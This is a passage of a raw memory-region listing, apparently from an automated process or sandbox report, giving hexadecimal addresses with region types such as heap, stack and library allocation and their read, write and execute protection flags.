heap
page read and write
212AD264000
trusted library allocation
page read and write
BFD8FCD000
stack
page read and write
1F55076B000
heap
page read and write
29AAE1B8000
trusted library allocation
page read and write
29AAEDFE000
trusted library allocation
page read and write
243FE563000
heap
page read and write
29AACD59000
trusted library allocation
page read and write
2ECE8FE000
stack
page read and write
29AAED2D000
trusted library allocation
page read and write
BA6000
heap
page read and write
29AAED86000
trusted library allocation
page read and write
29AAED95000
trusted library allocation
page read and write
29AACB7D000
trusted library allocation
page read and write
243FC78A000
heap
page read and write
7FF848DF4000
trusted library allocation
page read and write
29AAF287000
trusted library allocation
page read and write
5160000
heap
page read and write
29AAD886000
trusted library allocation
page read and write
29AADF6C000
trusted library allocation
page read and write
29AAE338000
trusted library allocation
page read and write
29AAE368000
trusted library allocation
page read and write
7FF8490F0000
trusted library allocation
page read and write
8A81FE000
stack
page read and write
29AAF468000
trusted library allocation
page read and write
29AAD8C6000
trusted library allocation
page read and write
29AAEB8E000
trusted library allocation
page read and write
1F550580000
heap
page read and write
21277604000
heap
page read and write
243FE86E000
heap
page read and write
29AAD7E6000
trusted library allocation
page read and write
29AAEE0E000
trusted library allocation
page read and write
29AAD846000
trusted library allocation
page read and write
1DE82497000
heap
page read and write
29AAF08E000
trusted library allocation
page read and write
29AADB56000
trusted library allocation
page read and write
29AAD045000
trusted library allocation
page read and write
212BCCEF000
trusted library allocation
page read and write
29AAEB37000
trusted library allocation
page read and write
29AACB5D000
trusted library allocation
page read and write
265D000
trusted library allocation
page read and write
29AAE538000
trusted library allocation
page read and write
29AAE148000
trusted library allocation
page read and write
29AAD8A6000
trusted library allocation
page read and write
1F5524E4000
heap
page read and write
29AAF096000
trusted library allocation
page read and write
1F5524DF000
heap
page read and write
29AAE0E8000
trusted library allocation
page read and write
1DE80540000
heap
page read and write
243FC795000
heap
page read and write
243FE5D5000
heap
page read and write
29AACE78000
trusted library allocation
page read and write
29AAEA79000
trusted library allocation
page read and write
29AAD4B6000
trusted library allocation
page read and write
29AAD285000
trusted library allocation
page read and write
1F5525B4000
heap
page read and write
29AAF06E000
trusted library allocation
page read and write
212AD29A000
trusted library allocation
page read and write
29AAD8E6000
trusted library allocation
page read and write
29AAC9DF000
trusted library allocation
page read and write
29AAE5E8000
trusted library allocation
page read and write
29ABA131000
trusted library allocation
page read and write
83B000
stack
page read and write
29AACFA6000
trusted library allocation
page read and write
29AAE728000
trusted library allocation
page read and write
52A1000
trusted library allocation
page read and write
1F552775000
heap
page read and write
29AAE807000
trusted library allocation
page read and write
29AAD736000
trusted library allocation
page read and write
212ACD07000
trusted library allocation
page read and write
29AAD0D4000
trusted library allocation
page read and write
243FE710000
heap
page read and write
29AADF7C000
trusted library allocation
page read and write
1F552517000
heap
page read and write
29AAE9F4000
trusted library allocation
page read and write
29AAF16E000
trusted library allocation
page read and write
1DE8252F000
heap
page read and write
29AAEE46000
trusted library allocation
page read and write
29AADC86000
trusted library allocation
page read and write
2ECE87E000
stack
page read and write
8A7CF9000
stack
page read and write
243FC99C000
heap
page read and write
1F550698000
heap
page read and write
1F5524FB000
heap
page read and write
29AAD055000
trusted library allocation
page read and write
7FF848EA0000
trusted library allocation
page read and write
243FE883000
heap
page read and write
29AAEDAD000
trusted library allocation
page read and write
243FE521000
heap
page read and write
29AACA1F000
trusted library allocation
page read and write
29AACD1A000
trusted library allocation
page read and write
7FF848FD0000
trusted library allocation
page execute and read and write
29AADD56000
trusted library allocation
page read and write
243FE5A3000
heap
page read and write
29AAEB27000
trusted library allocation
page read and write
29AA9BB0000
heap
page execute and read and write
29AAF10E000
trusted library allocation
page read and write
243FE863000
heap
page read and write
29AAE668000
trusted library allocation
page read and write
29AAD466000
trusted library allocation
page read and write
212AAF20000
heap
page read and write
29AAD168000
trusted library allocation
page read and write
29AAEC2D000
trusted library allocation
page read and write
29AAF264000
trusted library allocation
page read and write
29AACC5B000
trusted library allocation
page read and write
790867E000
stack
page read and write
659D000
stack
page read and write
243FC78A000
heap
page read and write
29AAF529000
trusted library allocation
page read and write
2125F513000
trusted library allocation
page read and write
1DE82466000
heap
page read and write
29AAEF0D000
trusted library allocation
page read and write
393B000
trusted library allocation
page read and write
29AAE758000
trusted library allocation
page read and write
29AAE348000
trusted library allocation
page read and write
29AAE3C8000
trusted library allocation
page read and write
29AAD976000
trusted library allocation
page read and write
29AAEFDE000
trusted library allocation
page read and write
1F550858000
heap
page read and write
29AAE995000
trusted library allocation
page read and write
29AAE468000
trusted library allocation
page read and write
7FF849060000
trusted library allocation
page read and write
29AAEAE0000
trusted library allocation
page read and write
29AAE098000
trusted library allocation
page read and write
29AACEE7000
trusted library allocation
page read and write
243FE721000
heap
page read and write
29AAE5B8000
trusted library allocation
page read and write
243FE71A000
heap
page read and write
29AADB26000
trusted library allocation
page read and write
1F55075D000
heap
page read and write
29AAEF1E000
trusted library allocation
page read and write
2125D392000
heap
page read and write
29AADCE6000
trusted library allocation
page read and write
1DE805F9000
heap
page read and write
243FC702000
heap
page read and write
29AAD6B6000
trusted library allocation
page read and write
1F552581000
heap
page read and write
29AADD76000
trusted library allocation
page read and write
1F5524F0000
heap
page read and write
5499000
stack
page read and write
29AAEDB6000
trusted library allocation
page read and write
1DE80550000
heap
page read and write
29AAEEB6000
trusted library allocation
page read and write
29AAE058000
trusted library allocation
page read and write
29AADA76000
trusted library allocation
page read and write
29AAED45000
trusted library allocation
page read and write
29AAD306000
trusted library allocation
page read and write
1F552090000
heap
page read and write
4A6D000
stack
page read and write
1F5525BF000
heap
page read and write
29AAE1A8000
trusted library allocation
page read and write
29AAD5C6000
trusted library allocation
page read and write
29AAC950000
trusted library allocation
page read and write
29AAEF66000
trusted library allocation
page read and write
29AAC720000
trusted library allocation
page read and write
2125F5F4000
trusted library allocation
page read and write
61DE000
stack
page read and write
29AAEB66000
trusted library allocation
page read and write
29AAEA4A000
trusted library allocation
page read and write
29AAD4D6000
trusted library allocation
page read and write
2125D5F0000
heap
page read and write
46B3CFF000
stack
page read and write
1DE824C1000
heap
page read and write
29AAF1A6000
trusted library allocation
page read and write
1F5524E0000
heap
page read and write
29AACDD9000
trusted library allocation
page read and write
4DF0000
trusted library allocation
page read and write
29AAE048000
trusted library allocation
page read and write
29AAEAD8000
trusted library allocation
page read and write
29AAE488000
trusted library allocation
page read and write
29AAF1E6000
trusted library allocation
page read and write
29AAD796000
trusted library allocation
page read and write
7FF849100000
trusted library allocation
page read and write
243FE529000
heap
page read and write
8A82FE000
stack
page read and write
243FE60E000
heap
page read and write
1F5506C0000
heap
page read and write
27B0000
trusted library allocation
page read and write
1F5506C0000
heap
page read and write
29AAF436000
trusted library allocation
page read and write
29AAD326000
trusted library allocation
page read and write
1F5525A2000
heap
page read and write
243FC78A000
heap
page read and write
29AAF426000
trusted library allocation
page read and write
29AAE248000
trusted library allocation
page read and write
1F550765000
heap
page read and write
29AAEF36000
trusted library allocation
page read and write
BFD817F000
stack
page read and write
29AAF44A000
trusted library allocation
page read and write
243FE5F5000
heap
page read and write
BFD837F000
stack
page read and write
29AAF186000
trusted library allocation
page read and write
BFD7B23000
stack
page read and write
29AAF260000
trusted library allocation
page read and write
29AAEFA6000
trusted library allocation
page read and write
243FC79B000
heap
page read and write
1F5506D0000
heap
page read and write
29AAD255000
trusted library allocation
page read and write
1DE82519000
heap
page read and write
7FF848ED0000
trusted library allocation
page execute and read and write
29AAD526000
trusted library allocation
page read and write
29AAEFEE000
trusted library allocation
page read and write
9E6000
heap
page read and write
29AAEDA5000
trusted library allocation
page read and write
29AAE9D5000
trusted library allocation
page read and write
2125F3E0000
heap
page read and write
243FC510000
heap
page read and write
29AAE837000
trusted library allocation
page read and write
2125F3F9000
heap
page read and write
29AAE3E8000
trusted library allocation
page read and write
1F550660000
heap
page read and write
1F5524F7000
heap
page read and write
29AAD3F6000
trusted library allocation
page read and write
27C0000
heap
page execute and read and write
29AAEF26000
trusted library allocation
page read and write
212AB050000
heap
page read and write
5570000
heap
page read and write
29AADD66000
trusted library allocation
page read and write
7FF848EA6000
trusted library allocation
page read and write
1DE82457000
heap
page read and write
29AAF05E000
trusted library allocation
page read and write
243FC73D000
heap
page read and write
BFD8F4E000
stack
page read and write
29AACCBA000
trusted library allocation
page read and write
29AAD366000
trusted library allocation
page read and write
1F552030000
heap
page read and write
1F55085A000
heap
page read and write
212AAD7E000
heap
page read and write
29AACED7000
trusted library allocation
page read and write
29AACC4B000
trusted library allocation
page read and write
29AAD866000
trusted library allocation
page read and write
29AADE67000
trusted library allocation
page read and write
29AAE408000
trusted library allocation
page read and write
29AAE198000
trusted library allocation
page read and write
212C53D0000
heap
page read and write
2125F604000
trusted library allocation
page read and write
1DE8246B000
heap
page read and write
243FE878000
heap
page read and write
29AAE528000
trusted library allocation
page read and write
29AADF88000
trusted library allocation
page read and write
1DE8055D000
heap
page read and write
29AAD756000
trusted library allocation
page read and write
29AAEDE6000
trusted library allocation
page read and write
29AAE578000
trusted library allocation
page read and write
29AADAA6000
trusted library allocation
page read and write
7FF848FE0000
trusted library allocation
page execute and read and write
212AAF40000
heap
page read and write
243FC750000
heap
page read and write
1DE807EE000
heap
page read and write
29AADA16000
trusted library allocation
page read and write
29AAE848000
trusted library allocation
page read and write
243FE797000
heap
page read and write
29AAEDCE000
trusted library allocation
page read and write
29AAF3E2000
trusted library allocation
page read and write
29AAF273000
trusted library allocation
page read and write
29AAD786000
trusted library allocation
page read and write
29AAEBA6000
trusted library allocation
page read and write
29AAECE5000
trusted library allocation
page read and write
AC0000
heap
page read and write
29AAED06000
trusted library allocation
page read and write
243FC756000
heap
page read and write
1DE82464000
heap
page read and write
1DE80560000
heap
page read and write
29AAE018000
trusted library allocation
page read and write
1DE80528000
heap
page read and write
29AACE97000
trusted library allocation
page read and write
29AAD174000
trusted library allocation
page read and write
29AAD386000
trusted library allocation
page read and write
29AAE2F8000
trusted library allocation
page read and write
790883D000
stack
page read and write
29AADDE6000
trusted library allocation
page read and write
29AACA3F000
trusted library allocation
page read and write
29AADA36000
trusted library allocation
page read and write
29AA82A8000
heap
page read and write
29AAD1F4000
trusted library allocation
page read and write
29AADEE7000
trusted library allocation
page read and write
29AAF026000
trusted library allocation
page read and write
29AAA2D3000
trusted library allocation
page read and write
29AADC36000
trusted library allocation
page read and write
29AAF04E000
trusted library allocation
page read and write
29AAEED6000
trusted library allocation
page read and write
29AAEE3E000
trusted library allocation
page read and write
243FE711000
heap
page read and write
29AAD6E6000
trusted library allocation
page read and write
29AAF116000
trusted library allocation
page read and write
2125F35F000
heap
page read and write
46B3EFB000
stack
page read and write
29AAD154000
trusted library allocation
page read and write
29AAEB7E000
trusted library allocation
page read and write
1F552774000
heap
page read and write
29AACECC000
trusted library allocation
page read and write
29AAD234000
trusted library allocation
page read and write
1F5524F7000
heap
page read and write
1DE824E1000
heap
page read and write
243FE3F3000
heap
page read and write
24EE000
stack
page read and write
29AAA4BD000
trusted library allocation
page read and write
29AADC76000
trusted library allocation
page read and write
1DE8264E000
heap
page read and write
29AAD546000
trusted library allocation
page read and write
5050000
heap
page execute and read and write
29AAF412000
trusted library allocation
page read and write
1F5506C6000
heap
page read and write
212C4FD0000
heap
page execute and read and write
29AADF78000
trusted library allocation
page read and write
2ECE6FF000
stack
page read and write
243FE40B000
heap
page read and write
212ACE01000
trusted library allocation
page read and write
243FC77D000
heap
page read and write
29AAA52D000
trusted library allocation
page read and write
243FE5B6000
heap
page read and write
29AA8274000
heap
page read and write
29AAF196000
trusted library allocation
page read and write
7FF849030000
trusted library allocation
page read and write
29AAE858000
trusted library allocation
page read and write
29AADD06000
trusted library allocation
page read and write
29AAF40E000
trusted library allocation
page read and write
29AAECD5000
trusted library allocation
page read and write
29AAA0A0000
heap
page read and write
243FE5A3000
heap
page read and write
243FC7E0000
heap
page read and write
2125D5A0000
heap
page readonly
21277676000
heap
page read and write
1DE805D5000
heap
page read and write
212ACE50000
trusted library allocation
page read and write
29AADE47000
trusted library allocation
page read and write
29AAEF96000
trusted library allocation
page read and write
212AAFF0000
heap
page readonly
29AAE068000
trusted library allocation
page read and write
29AAA489000
trusted library allocation
page read and write
1F5524D6000
heap
page read and write
243FC749000
heap
page read and write
243FC7E0000
heap
page read and write
29AACCEA000
trusted library allocation
page read and write
29AAF1CE000
trusted library allocation
page read and write
212C4E01000
heap
page read and write
2125D3EB000
heap
page read and write
29AACD4A000
trusted library allocation
page read and write
29AAF11E000
trusted library allocation
page read and write
243FC726000
heap
page read and write
29AAE168000
trusted library allocation
page read and write
29AACF3C000
trusted library allocation
page read and write
29AAF0CE000
trusted library allocation
page read and write
29AAEBED000
trusted library allocation
page read and write
48D8000
trusted library allocation
page read and write
AAA000
trusted library allocation
page execute and read and write
551E000
stack
page read and write
1F5525A5000
heap
page read and write
29AAD876000
trusted library allocation
page read and write
29AADE37000
trusted library allocation
page read and write
29AACD89000
trusted library allocation
page read and write
1F5524D1000
heap
page read and write
B00000
heap
page read and write
1F5506BA000
heap
page read and write
4E22000
trusted library allocation
page read and write
29AAF1C6000
trusted library allocation
page read and write
1F550858000
heap
page read and write
243FC795000
heap
page read and write
ABB000
trusted library allocation
page execute and read and write
29AAD2F6000
trusted library allocation
page read and write
29AAD5E6000
trusted library allocation
page read and write
1F554330000
trusted library allocation
page read and write
29AAF27F000
trusted library allocation
page read and write
29AAD706000
trusted library allocation
page read and write
212AAD79000
heap
page read and write
1F5525AE000
heap
page read and write
29AAEB1F000
trusted library allocation
page read and write
29AACAED000
trusted library allocation
page read and write
1F55403E000
heap
page read and write
243FC78F000
heap
page read and write
990000
heap
page read and write
1F552514000
heap
page read and write
639E000
unkown
page read and write
1F55076B000
heap
page read and write
29AAE118000
trusted library allocation
page read and write
1F550763000
heap
page read and write
29AAF146000
trusted library allocation
page read and write
1DE82451000
heap
page read and write
1DE82470000
heap
page read and write
29AAF1BE000
trusted library allocation
page read and write
1F5506B0000
heap
page read and write
1DE824FE000
heap
page read and write
243FC7A6000
heap
page read and write
1DE8264C000
heap
page read and write
29AAE7F7000
trusted library allocation
page read and write
243FE719000
heap
page read and write
7FF848DF3000
trusted library allocation
page execute and read and write
260C000
stack
page read and write
29AAD0A4000
trusted library allocation
page read and write
1DE805F3000
heap
page read and write
1F5524F0000
heap
page read and write
243FC610000
heap
page read and write
29AAF42E000
trusted library allocation
page read and write
29AACEB7000
trusted library allocation
page read and write
29AAE788000
trusted library allocation
page read and write
3F2B5FE000
stack
page read and write
29AAF0F6000
trusted library allocation
page read and write
29AAD6F6000
trusted library allocation
page read and write
29AAF3D6000
trusted library allocation
page read and write
2125F4D0000
heap
page execute and read and write
1DE82525000
heap
page read and write
29AAF28B000
trusted library allocation
page read and write
1F5526CE000
heap
page read and write
212C4EDE000
heap
page read and write
2610000
trusted library allocation
page execute and read and write
29AACE48000
trusted library allocation
page read and write
29AAE598000
trusted library allocation
page read and write
1DE805F1000
heap
page read and write
29AAEF86000
trusted library allocation
page read and write
29AAD114000
trusted library allocation
page read and write
212ACDFE000
trusted library allocation
page read and write
29AAEFAE000
trusted library allocation
page read and write
7FF849050000
trusted library allocation
page read and write
29AAED3E000
trusted library allocation
page read and write
29ABA3AD000
trusted library allocation
page read and write
46B38FE000
stack
page read and write
29AAE208000
trusted library allocation
page read and write
29AAEFC6000
trusted library allocation
page read and write
29AADFBC000
trusted library allocation
page read and write
1F5526D1000
heap
page read and write
29AA9BB7000
heap
page execute and read and write
29AAD776000
trusted library allocation
page read and write
29AAF26F000
trusted library allocation
page read and write
4E30000
trusted library allocation
page read and write
29AACEA7000
trusted library allocation
page read and write
29AACC2B000
trusted library allocation
page read and write
243FC78F000
heap
page read and write
7FF848FB0000
trusted library allocation
page read and write
29AAE798000
trusted library allocation
page read and write
29AAD516000
trusted library allocation
page read and write
29AACC61000
trusted library allocation
page read and write
A40000
heap
page read and write
29AAE418000
trusted library allocation
page read and write
2125F587000
trusted library allocation
page read and write
29AAE568000
trusted library allocation
page read and write
29AAD188000
trusted library allocation
page read and write
29AA8260000
heap
page read and write
7FF848FD2000
trusted library allocation
page read and write
243FC980000
remote allocation
page read and write
2125F648000
trusted library allocation
page read and write
4F00000
heap
page read and write
29AACD3A000
trusted library allocation
page read and write
29AAD476000
trusted library allocation
page read and write
7FF8490D0000
trusted library allocation
page read and write
29AAD2B5000
trusted library allocation
page read and write
2125D69E000
heap
page read and write
29AAF3F2000
trusted library allocation
page read and write
29AAEFB6000
trusted library allocation
page read and write
29AAD646000
trusted library allocation
page read and write
243FE60E000
heap
page read and write
2125D590000
trusted library allocation
page read and write
29AAEB17000
trusted library allocation
page read and write
243FC78A000
heap
page read and write
29AACB2D000
trusted library allocation
page read and write
29AAEC65000
trusted library allocation
page read and write
1DE8250D000
heap
page read and write
29AAD094000
trusted library allocation
page read and write
29AAEE56000
trusted library allocation
page read and write
7F690000
trusted library allocation
page execute and read and write
212C4E05000
heap
page read and write
29AACE58000
trusted library allocation
page read and write
29AAF0B6000
trusted library allocation
page read and write
29AAD826000
trusted library allocation
page read and write
1DE82536000
heap
page read and write
243FE5A5000
heap
page read and write
7FF8490E0000
trusted library allocation
page read and write
1F55258D000
heap
page read and write
29AACB3D000
trusted library allocation
page read and write
243FE7C6000
heap
page read and write
1DE8252E000
heap
page read and write
212AD3EA000
trusted library allocation
page read and write
1F552523000
heap
page read and write
243FE0A0000
heap
page read and write
29AAD666000
trusted library allocation
page read and write
29AAD626000
trusted library allocation
page read and write
29AAD746000
trusted library allocation
page read and write
7FF8490A0000
trusted library allocation
page read and write
1DE807E8000
heap
page read and write
212AD2E4000
trusted library allocation
page read and write
29AA9B90000
heap
page readonly
7FF849110000
trusted library allocation
page read and write
29AAE7B8000
trusted library allocation
page read and write
243FE742000
heap
page read and write
29AACBBC000
trusted library allocation
page read and write
29AAEF9E000
trusted library allocation
page read and write
2125F550000
trusted library allocation
page read and write
1F5525B6000
heap
page read and write
1F5524F7000
heap
page read and write
243FC77D000
heap
page read and write
1DE824F5000
heap
page read and write
2126F564000
trusted library allocation
page read and write
29AAE428000
trusted library allocation
page read and write
7FF848EAC000
trusted library allocation
page execute and read and write
5EBE000
stack
page read and write
243FC995000
heap
page read and write
1F5525A5000
heap
page read and write
790847F000
stack
page read and write
29AA9B80000
trusted library allocation
page read and write
29AAF01E000
trusted library allocation
page read and write
29AAF3EE000
trusted library allocation
page read and write
29AADAD6000
trusted library allocation
page read and write
29AAD224000
trusted library allocation
page read and write
7FF848FC0000
trusted library allocation
page execute and read and write
29AAEC75000
trusted library allocation
page read and write
1DE807E0000
heap
page read and write
1DE824A0000
heap
page read and write
29AAF277000
trusted library allocation
page read and write
29AAEAB1000
trusted library allocation
page read and write
29AAD4E6000
trusted library allocation
page read and write
BFD904B000
stack
page read and write
29AAF0E6000
trusted library allocation
page read and write
1F552094000
heap
page read and write
1F55076F000
heap
page read and write
29AAE3A8000
trusted library allocation
page read and write
29AAF43E000
trusted library allocation
page read and write
29AAD6A6000
trusted library allocation
page read and write
1DE8264E000
heap
page read and write
212C4DF9000
heap
page read and write
1F552541000
heap
page read and write
2ECEDBF000
stack
page read and write
243FC7A7000
heap
page read and write
29AAE328000
trusted library allocation
page read and write
29AAD0F4000
trusted library allocation
page read and write
243FE711000
heap
page read and write
29AAE358000
trusted library allocation
page read and write
29AAEE7E000
trusted library allocation
page read and write
29AADF98000
trusted library allocation
page read and write
1F552586000
heap
page read and write
29AAEAE8000
trusted library allocation
page read and write
29AAEECE000
trusted library allocation
page read and write
212AADC3000
heap
page read and write
243FC999000
heap
page read and write
29AAE458000
trusted library allocation
page read and write
29AAD1B4000
trusted library allocation
page read and write
29AACBDC000
trusted library allocation
page read and write
29AAEAC8000
trusted library allocation
page read and write
29AADED7000
trusted library allocation
page read and write
7FF8490B0000
trusted library allocation
page read and write
29AAD2D5000
trusted library allocation
page read and write
29AADF58000
trusted library allocation
page read and write
29AAEE8E000
trusted library allocation
page read and write
1F550790000
heap
page read and write
29AADD36000
trusted library allocation
page read and write
1DE824A3000
heap
page read and write
1DE805EF000
heap
page read and write
29AADAC6000
trusted library allocation
page read and write
29AAE5D8000
trusted library allocation
page read and write
2125F4B0000
heap
page read and write
29AAF43A000
trusted library allocation
page read and write
6008000
heap
page read and write
1DE82525000
heap
page read and write
212BCD54000
trusted library allocation
page read and write
2125F320000
heap
page read and write
29AADE27000
trusted library allocation
page read and write
1DE8245C000
heap
page read and write
7FF848E00000
trusted library allocation
page read and write
29AAF4E5000
trusted library allocation
page read and write
29AAF12E000
trusted library allocation
page read and write
29AAEAF8000
trusted library allocation
page read and write
212ACCD0000
heap
page execute and read and write
276E000
stack
page read and write
29AAD4F6000
trusted library allocation
page read and write
29AAE008000
trusted library allocation
page read and write
29AAD204000
trusted library allocation
page read and write
29AAED7D000
trusted library allocation
page read and write
29AADCA6000
trusted library allocation
page read and write
29AACF07000
trusted library allocation
page read and write
29AAEFBE000
trusted library allocation
page read and write
29AAF036000
trusted library allocation
page read and write
7FF848DF2000
trusted library allocation
page read and write
212ACE04000
trusted library allocation
page read and write
29AAE378000
trusted library allocation
page read and write
29AAF402000
trusted library allocation
page read and write
29AAD3B6000
trusted library allocation
page read and write
29AAD3E6000
trusted library allocation
page read and write
1F5524F7000
heap
page read and write
29AAF3FE000
trusted library allocation
page read and write
29AACC31000
trusted library allocation
page read and write
1F552596000
heap
page read and write
243FE71A000
heap
page read and write
29AAC9BF000
trusted library allocation
page read and write
212AAD30000
heap
page read and write
29AA9FD0000
heap
page execute and read and write
243FE5A5000
heap
page read and write
29AAF046000
trusted library allocation
page read and write
AF4000
heap
page read and write
1F5506C0000
heap
page read and write
29AAF3CE000
trusted library allocation
page read and write
29AADD46000
trusted library allocation
page read and write
29AAEEFE000
trusted library allocation
page read and write
29AAEE4E000
trusted library allocation
page read and write
1DE824EA000
heap
page read and write
29AACF0C000
trusted library allocation
page read and write
29AAE4E8000
trusted library allocation
page read and write
29AAEE76000
trusted library allocation
page read and write
1F55258A000
heap
page read and write
243FC71A000
heap
page read and write
1F55076B000
heap
page read and write
1DE80710000
heap
page read and write
29AADA46000
trusted library allocation
page read and write
243FC99B000
heap
page read and write
29AAE7C8000
trusted library allocation
page read and write
243FE863000
heap
page read and write
1DE8246B000
heap
page read and write
29AAEC5D000
trusted library allocation
page read and write
2125EFD4000
heap
page read and write
1F5524F0000
heap
page read and write
243FE757000
heap
page read and write
1DE83FC2000
heap
page read and write
29AAF283000
trusted library allocation
page read and write
29AAE278000
trusted library allocation
page read and write
29AAE608000
trusted library allocation
page read and write
212AD10F000
trusted library allocation
page read and write
29AAE9E6000
trusted library allocation
page read and write
212775F0000
heap
page read and write
29AAEBFD000
trusted library allocation
page read and write
212ACE12000
trusted library allocation
page read and write
29AAE2E8000
trusted library allocation
page read and write
243FC7DE000
heap
page read and write
243FC7A3000
heap
page read and write
1F554030000
heap
page read and write
29AAD6D6000
trusted library allocation
page read and write
29AACC51000
trusted library allocation
page read and write
212C4EC7000
heap
page read and write
A34000
trusted library allocation
page read and write
7FF849020000
trusted library allocation
page read and write
504C000
stack
page read and write
1DE82460000
heap
page read and write
1F5525BB000
heap
page read and write
1DE8253B000
heap
page read and write
29AACA2F000
trusted library allocation
page read and write
29AAE1D8000
trusted library allocation
page read and write
29AAE078000
trusted library allocation
page read and write
1F5524FC000
heap
page read and write
2640000
trusted library allocation
page read and write
2125F515000
trusted library allocation
page read and write
BFD7FFE000
stack
page read and write
4E11000
trusted library allocation
page read and write
29AAD184000
trusted library allocation
page read and write
1DE805F6000
heap
page read and write
1DE80730000
heap
page read and write
5540000
heap
page read and write
29AACDA9000
trusted library allocation
page read and write
29AADEA7000
trusted library allocation
page read and write
29AAF3E6000
trusted library allocation
page read and write
1DE824B1000
heap
page read and write
2126F4F1000
trusted library allocation
page read and write
BFD847E000
stack
page read and write
243FC7DE000
heap
page read and write
29AAF076000
trusted library allocation
page read and write
29AAF0AE000
trusted library allocation
page read and write
29AADDC6000
trusted library allocation
page read and write
7FF849080000
trusted library allocation
page read and write
29AAE588000
trusted library allocation
page read and write
1F5506B9000
heap
page read and write
3F2ADB9000
stack
page read and write
7FF8490C0000
trusted library allocation
page read and write
A10000
trusted library allocation
page read and write
980000
heap
page read and write
4DF6000
trusted library allocation
page read and write
1DE805F9000
heap
page read and write
212C5000000
heap
page read and write
243FE40C000
heap
page read and write
29AAD606000
trusted library allocation
page read and write
7FF848E14000
trusted library allocation
page read and write
29AADF28000
trusted library allocation
page read and write
212AADC1000
heap
page read and write
243FE863000
heap
page read and write
5290000
heap
page read and write
1F5524E6000
heap
page read and write
212C4E8E000
heap
page read and write
29AAF41E000
trusted library allocation
page read and write
243FC998000
heap
page read and write
1DE8055B000
heap
page read and write
2ECE363000
stack
page read and write
BFD857B000
stack
page read and write
2125F995000
trusted library allocation
page read and write
1F550763000
heap
page read and write
29AAE1F8000
trusted library allocation
page read and write
1DE80550000
heap
page read and write
29AAF0D6000
trusted library allocation
page read and write
29AAEDDD000
trusted library allocation
page read and write
29AAEEC5000
trusted library allocation
page read and write
29AAE2A8000
trusted library allocation
page read and write
AA6000
trusted library allocation
page execute and read and write
29AAF3BE000
trusted library allocation
page read and write
29AAEB08000
trusted library allocation
page read and write
29AACBCC000
trusted library allocation
page read and write
29AAD9E6000
trusted library allocation
page read and write
29AADBB6000
trusted library allocation
page read and write
29AAF52F000
trusted library allocation
page read and write
29AAE5A8000
trusted library allocation
page read and write
2125D3BD000
heap
page read and write
29ABA0C0000
trusted library allocation
page read and write
A46000
heap
page read and write
29AADA06000
trusted library allocation
page read and write
1DE807EA000
heap
page read and write
243FC795000
heap
page read and write
29AAE158000
trusted library allocation
page read and write
29AAEA3A000
trusted library allocation
page read and write
29AAF214000
trusted library allocation
page read and write
29AAEA6A000
trusted library allocation
page read and write
29AAD275000
trusted library allocation
page read and write
2125D471000
heap
page read and write
1F55251C000
heap
page read and write
29AAED5D000
trusted library allocation
page read and write
1DE824F2000
heap
page read and write
29AAF4E2000
trusted library allocation
page read and write
29AADC66000
trusted library allocation
page read and write
7908B3B000
stack
page read and write
29AAEEDE000
trusted library allocation
page read and write
29AAE0D8000
trusted library allocation
page read and write
29AAD7D6000
trusted library allocation
page read and write
29AA9BF4000
heap
page read and write
29AAE708000
trusted library allocation
page read and write
7FF848E20000
trusted library allocation
page read and write
21277510000
heap
page read and write
212774F0000
heap
page read and write
1F5524DC000
heap
page read and write
212C4E57000
heap
page read and write
29AADE97000
trusted library allocation
page read and write
29AAE748000
trusted library allocation
page read and write
BFD83FE000
stack
page read and write
29AAEEEE000
trusted library allocation
page read and write
1DE83FB0000
heap
page read and write
29AAEDC5000
trusted library allocation
page read and write
29AAE028000
trusted library allocation
page read and write
1F5524D9000
heap
page read and write
212C4EED000
heap
page read and write
29AAF3CA000
trusted library allocation
page read and write
1DE82470000
heap
page read and write
29AADFC8000
trusted library allocation
page read and write
7FF8490E0000
trusted library allocation
page read and write
29AADF9C000
trusted library allocation
page read and write
2125D690000
heap
page read and write
7FF849100000
trusted library allocation
page read and write
1F55085D000
heap
page read and write
1DE805ED000
heap
page read and write
2125D3E7000
heap
page read and write
8A7DFE000
stack
page read and write
29AAD3D6000
trusted library allocation
page read and write
29AACE88000
trusted library allocation
page read and write
7FF848FF2000
trusted library allocation
page read and write
29AAD3A6000
trusted library allocation
page read and write
29AAE388000
trusted library allocation
page read and write
1DE82474000
heap
page read and write
29AAEB9E000
trusted library allocation
page read and write
29AAD536000
trusted library allocation
page read and write
29AACD0A000
trusted library allocation
page read and write
1DE842E0000
trusted library allocation
page read and write
7FF848EB0000
trusted library allocation
page execute and read and write
79089BE000
stack
page read and write
AA0000
trusted library allocation
page read and write
29AAD1C4000
trusted library allocation
page read and write
29AAF27B000
trusted library allocation
page read and write
AB7000
trusted library allocation
page execute and read and write
7FF848DFD000
trusted library allocation
page execute and read and write
29AAEB76000
trusted library allocation
page read and write
BFD7F7D000
stack
page read and write
243FE60E000
heap
page read and write
7FF849080000
trusted library allocation
page read and write
29AAAF2D000
trusted library allocation
page read and write
1DE8248F000
heap
page read and write
29AAF28E000
trusted library allocation
page read and write
2ECE77E000
stack
page read and write
243FE3F0000
heap
page read and write
29AADB96000
trusted library allocation
page read and write
8A83FE000
stack
page read and write
29AAF056000
trusted library allocation
page read and write
29AAF0FE000
trusted library allocation
page read and write
29AADEB7000
trusted library allocation
page read and write
212ACF76000
trusted library allocation
page read and write
29AAE95A000
trusted library allocation
page read and write
1F552549000
heap
page read and write
3F2B6FF000
stack
page read and write
29AAE9BC000
trusted library allocation
page read and write
1DE80556000
heap
page read and write
7FF8490C0000
trusted library allocation
page read and write
27AA000
stack
page read and write
243FC7A7000
heap
page read and write
29AAD9A6000
trusted library allocation
page read and write
29AAECFD000
trusted library allocation
page read and write
29AAEB0F000
trusted library allocation
page read and write
8A80FE000
stack
page read and write
29AACCDA000
trusted library allocation
page read and write
29AAC970000
trusted library allocation
page read and write
1DE82477000
heap
page read and write
29AADCC6000
trusted library allocation
page read and write
243FE5A3000
heap
page read and write
29AAF07E000
trusted library allocation
page read and write
29AAE0C8000
trusted library allocation
page read and write
29AAF446000
trusted library allocation
page read and write
29AA829E000
heap
page read and write
212C4EF0000
heap
page execute and read and write
2125F608000
trusted library allocation
page read and write
29AAD0B4000
trusted library allocation
page read and write
21277632000
heap
page read and write
29AAFC1A000
trusted library allocation
page read and write
29AAD0E4000
trusted library allocation
page read and write
29AAE879000
trusted library allocation
page read and write
29AADF5C000
trusted library allocation
page read and write
A20000
heap
page read and write
29AAEA91000
trusted library allocation
page read and write
7FF848ED6000
trusted library allocation
page execute and read and write
7FF848FE0000
trusted library allocation
page execute and read and write
29AAF292000
trusted library allocation
page read and write
BFD8278000
stack
page read and write
212AD173000
